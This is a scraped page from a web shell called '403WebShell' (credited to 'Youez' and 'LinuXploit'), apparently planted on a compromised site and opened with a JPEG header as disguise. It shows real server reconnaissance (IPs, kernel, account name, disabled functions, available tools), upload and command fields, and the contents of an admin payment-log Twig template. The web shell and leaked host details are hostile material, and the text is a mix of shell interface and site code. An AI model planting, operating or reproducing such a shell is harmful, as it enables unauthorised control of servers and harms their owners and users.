����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 18.218.135.221
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/ideyshare.name.ng/app/views/admin/ajax/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/ideyshare.name.ng/app/views/admin/ajax/payment_manage_add_form.html.twig
<form id="editFileFormInner" class="form-horizontal form-label-left input_mask">
    <div class="x_panel">
        <div class="x_content">
            <div class="x_title">
                <h2>Log Payment:</h2>
                <div class="clearfix"></div>
            </div>
            <p>Use the form below to add an entry into the payments log. Note: This will not upgrade users, youll need to manually do this via the edit user page.</p>
            <div class="form-group">
                <label class="control-label col-md-3 col-sm-3 col-xs-12">User:</label>
                <div class="col-md-9 col-sm-9 col-xs-12">
                    <select name="user_id" id="user_id" class="form-control">

                        <option value="">- select -</option>
                        {% for user in users %}
                            <option value="{{ user['id'] }}">{{ user['username'] }} ({{ user['email'] }})</option>
                        {% endfor %}
                    </select>
                </div>
            </div>
            <div class="form-group">
                <label class="control-label col-md-3 col-sm-3 col-xs-12">Payment Date/Time:</label>
                <div class="col-md-5 col-sm-5 col-xs-12">
                    <input name="payment_date" id="payment_date" type="text" value="{{ payment_date }}" class="form-control" placeholder="{{ payment_date }}"/>
                </div>
            </div>
            <div class="form-group">
                <label class="control-label col-md-3 col-sm-3 col-xs-12">Payment Amount:</label>
                <div class="col-md-5 col-sm-5 col-xs-12">
                    <div class="input-group">
                        <span class="input-group-addon">{{ SITE_CONFIG_COST_CURRENCY_SYMBOL }}</span>
                        <input name="payment_amount" id="payment_amount" type="text" class="form-control" placeholder="0.00"/>
                    </div>
                </div>
            </div>
            <div class="form-group">
                <label class="control-label col-md-3 col-sm-3 col-xs-12">Description:</label>
                <div class="col-md-9 col-sm-9 col-xs-12">
                    <input name="description" id="description" type="text" value="{{ description }}" class="form-control"/>
                </div>
            </div>
            <div class="form-group">
                <label class="control-label col-md-3 col-sm-3 col-xs-12">Payment Method:</label>
                <div class="col-md-5 col-sm-5 col-xs-12">
                    <select name="payment_method" id="payment_method" class="form-control">
                        {% for paymentMethod in paymentMethods %}
                            <option value="{{ paymentMethod }}"{{ paymentMethod == payment_method?' SELECTED':'' }}>{{ paymentMethod }}</option>
                        {% endfor %}
                    </select>
                </div>
            </div>
            <div class="form-group">
                <label class="control-label col-md-3 col-sm-3 col-xs-12">Additional Notes:</label>
                <div class="col-md-9 col-sm-9 col-xs-12">
                    <textarea name="notes" id="notes" class="form-control"></textarea>
                </div>
            </div>
        </div>
    </div>
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit